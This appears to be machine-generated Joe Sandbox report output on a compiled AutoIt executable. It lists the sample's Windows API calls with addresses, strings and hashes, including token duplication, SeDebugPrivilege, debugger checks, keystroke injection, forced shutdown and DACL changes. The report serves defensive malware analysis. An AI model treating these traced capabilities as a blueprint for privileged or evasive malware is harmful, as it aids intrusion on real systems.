                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$State$LongProcWindow
                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: PF$'|G$*"D$*vG$+%F$0wE$2G$5CG$7eF$<HF$<G$ApG$DvE$GSG$IqE$K@G$LbF$MdF$NgF$PIF$YtG$^[F$_?G$b"D$i}G$j)F$kQG$lE$rTG$vjE$}eE$*F$3G$_G$wG
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                • IsIconic.USER32(?), ref: 004375E1
                                                                                                                • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                APIs
                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload
                                                                                                                • String ID: $default$winsta0
                                                                                                                • API String ID: 4266742174-1027155976
                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast
                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                • API String ID: 1606813200-2896544425
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\p4rsJEIb7k.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 0040D7D6
                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00431B0E
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,00000004), ref: 00431B3F
                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LoadWindow$IconName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_
                                                                                                                • String ID: @GH$@GH$C:\Users\user\Desktop\p4rsJEIb7k.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                • API String ID: 3436406043-472135737
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\p4rsJEIb7k.exe,?,C:\Users\user\Desktop\p4rsJEIb7k.exe,004A8E80,C:\Users\user\Desktop\p4rsJEIb7k.exe,0040F3D2), ref: 0040FFCA
                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$CloseCopyDeleteMove$AttributesFirstFullNameNextPathlstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2518010859-1173974218
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timetime$Sleep
                                                                                                                • String ID: BUTTON
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                • GetLastError.KERNEL32 ref: 00436504
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                Similarity
                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                                Strings
                                                                                                                • Error opening the file, xrefs: 0042B8AC
                                                                                                                • _, xrefs: 00403B48
                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                                • Unterminated string, xrefs: 0042B9BA
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharCurrentDirectoryMultiWide$FullNamePath
                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                Strings
                                                                                                                • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstance$BlanketFromProgProxySecurity
                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                APIs
                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock$Sizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 4215241788-0
                                                                                                                • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                Similarity
                                                                                                                • API ID: CopyVariant$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 3904779488-2761332787
                                                                                                                • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000000), ref: 004648B0
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                • bind.WSOCK32(00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648DA
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000005,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 0046492D
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 2609815416-0
                                                                                                                • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?$T$_iB
                                                                                                                • API String ID: 0-4145368158
                                                                                                                • Opcode ID: 40fd759e06795c51c6d44f44d3c5b8b210a1b9c9a66bbae5e363e359e7067c76
                                                                                                                • Instruction ID: 4c0c7ed0c9658f191bc49dc210f9e18f2f65a652a6defb2a8c1265378aa6e59e
